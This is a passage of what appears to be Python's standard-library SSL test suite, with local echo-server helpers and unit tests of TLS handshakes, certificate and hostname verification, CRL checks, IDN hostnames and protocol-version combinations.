except (ConnectionResetError, BrokenPipeError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# BrokenPipeError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake.
# https://github.com/openssl/openssl/issues/6342
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.close()
return False
except (ssl.SSLError, OSError) as e:
# OSError may occur with wrong protocols, e.g. both
# sides use PROTOCOL_TLS_SERVER.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
#
# bpo-31323: Store the exception as string to prevent
# a reference leak: server -> conn_errors -> exception
# -> traceback -> self (ConnectionHandler) -> server
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol is now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, data):
if self.sslconn:
return self.sslconn.write(data)
else:
return self.sock.send(data)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
try:
self.sock = self.sslconn.unwrap()
except OSError:
# Many tests shut the TCP connection down
# without an SSL shutdown. This causes
# unwrap() to raise OSError with errno=0!
pass
else:
self.sslconn = None
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except ConnectionResetError:
# XXX: OpenSSL 1.1.1 sometimes raises ConnectionResetError
# when connection is not shut down gracefully.
if self.server.chatty and support.verbose:
sys.stdout.write(
" Connection reset by peer: {}\n".format(
self.addr)
)
self.close()
self.running = False
except OSError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
npn_protocols=None, alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLS_SERVER)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if npn_protocols:
self.context.set_npn_protocols(npn_protocols)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_npn_protocols = []
self.selected_alpn_protocols = []
self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen()
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
except BaseException as e:
if support.verbose and self.chatty:
sys.stdout.write(
' connection handling failed: ' + repr(e) + '\n')
self.sock.close()
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
class EchoServer (asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = test_wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
# make sure that ConnectionHandler is removed from socket_map
asyncore.close_all(ignore_all=True)
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None,
session=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name, session=session) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'client_npn_protocol': s.selected_npn_protocol(),
'version': s.version(),
'session_reused': s.session_reused,
'session': s.session,
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_npn_protocols'] = server.selected_npn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds;
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_TLS:
client_context.set_ciphers("ALL")
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(SIGNED_CERTFILE)
ctx.load_verify_locations(SIGNING_CA)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
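# try_protocol_combo() pins versions with the legacy PROTOCOL_* constants
# and OP_NO_* options used throughout this file; a sketch of the modern
# equivalent (Python 3.7+) bounds a PROTOCOL_TLS_CLIENT context with
# TLSVersion instead:
import ssl

ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.minimum_version = ssl.TLSVersion.TLSv1_2   # refuse anything older
ctx.maximum_version = ssl.TLSVersion.TLSv1_2   # and anything newer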
class ThreadedTests(unittest.TestCase):
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
if protocol in {ssl.PROTOCOL_TLS_CLIENT, ssl.PROTOCOL_TLS_SERVER}:
continue
with self.subTest(protocol=ssl._PROTOCOL_NAMES[protocol]):
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
client_context, server_context, hostname = testing_context()
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_SERVER):
server_params_test(client_context=client_context,
server_context=server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
client_context.check_hostname = False
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_SERVER):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=server_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=client_context,
server_context=client_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
do_handshake_on_connect=False,
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# getpeercert() raises ValueError while the handshake isn't done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(client_context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
client_context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
client_context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(
ssl.CertificateError,
"Hostname mismatch, certificate is not valid for 'invalid'."):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
client_context.wrap_socket(s)
def test_ecc_cert(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC cert
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertEqual(cipher[:2], ['ECDHE', 'ECDSA'])  # assertTrue(x, msg) would always pass
def test_dual_rsa_ecc(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
# TODO: fix TLSv1.3 once SSLContext can restrict signature
# algorithms.
client_context.options |= ssl.OP_NO_TLSv1_3
# only ECDSA certs
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC and RSA key/cert pairs
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
server_context.load_cert_chain(SIGNED_CERTFILE)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertEqual(cipher[:2], ['ECDHE', 'ECDSA'])  # assertTrue(x, msg) would always pass
def test_check_hostname_idn(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(IDNSANSFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify, when specified in several
# different ways
idn_hostnames = [
('könig.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
(b'xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('königsgäßchen.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
('xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
(b'xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
# ('königsgäßchen.idna2008.pythontest.net',
# 'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
('xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
(b'xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
]
for server_hostname, expected_hostname in idn_hostnames:
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=server_hostname) as s:
self.assertEqual(s.server_hostname, expected_hostname)
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertEqual(s.server_hostname, expected_hostname)
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="python.example.org") as s:
with self.assertRaises(ssl.CertificateError):
s.connect((HOST, server.port))
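# The IDN table above relies on the stdlib "idna" codec (IDNA 2003): a
# non-ASCII hostname encodes to its ASCII-compatible xn-- form, which is
# what SSLSocket.server_hostname stores and what certificates are matched
# against.
assert ("könig.idn.pythontest.net".encode("idna")
        == b"xn--knig-5qa.idn.pythontest.net")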
def test_wrong_cert_tls12(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
client_context, server_context, hostname = testing_context()
# load client cert
client_context.load_cert_chain(WRONG_CERT)
# require TLS client authentication
server_context.verify_mode = ssl.CERT_REQUIRED
# TLS 1.3 has different handshake
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
@unittest.skipUnless(ssl.HAS_TLSv1_3, "Test needs TLS 1.3")
def test_wrong_cert_tls13(self):
client_context, server_context, hostname = testing_context()
client_context.load_cert_chain(WRONG_CERT)
server_context.verify_mode = ssl.CERT_REQUIRED
server_context.minimum_version = ssl.TLSVersion.TLSv1_3
client_context.minimum_version = ssl.TLSVersion.TLSv1_3
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# TLS 1.3 performs the client cert exchange after the handshake
s.connect((HOST, server.port))
try:
s.write(b'data')
s.read(4)
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = test_wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
def test_ssl_cert_verify_error(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
try:
s.connect((HOST, server.port))
except ssl.SSLError as e:
msg = 'unable to get local issuer certificate'
self.assertIsInstance(e, ssl.SSLCertVerificationError)
self.assertEqual(e.verify_code, 20)
self.assertEqual(e.verify_message, msg)
self.assertIn(msg, repr(e))
self.assertIn('certificate verify failed', repr(e))
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
"OpenSSL is compiled without SSLv2 support")
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
def test_PROTOCOL_TLS(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1')
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
"OpenSSL is compiled without SSLv3 support")
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS,
False, client_options=ssl.OP_NO_SSLv2)
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
"TLS version 1.1 not supported.")
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if hasattr(ssl, 'PROTOCOL_SSLv2'):
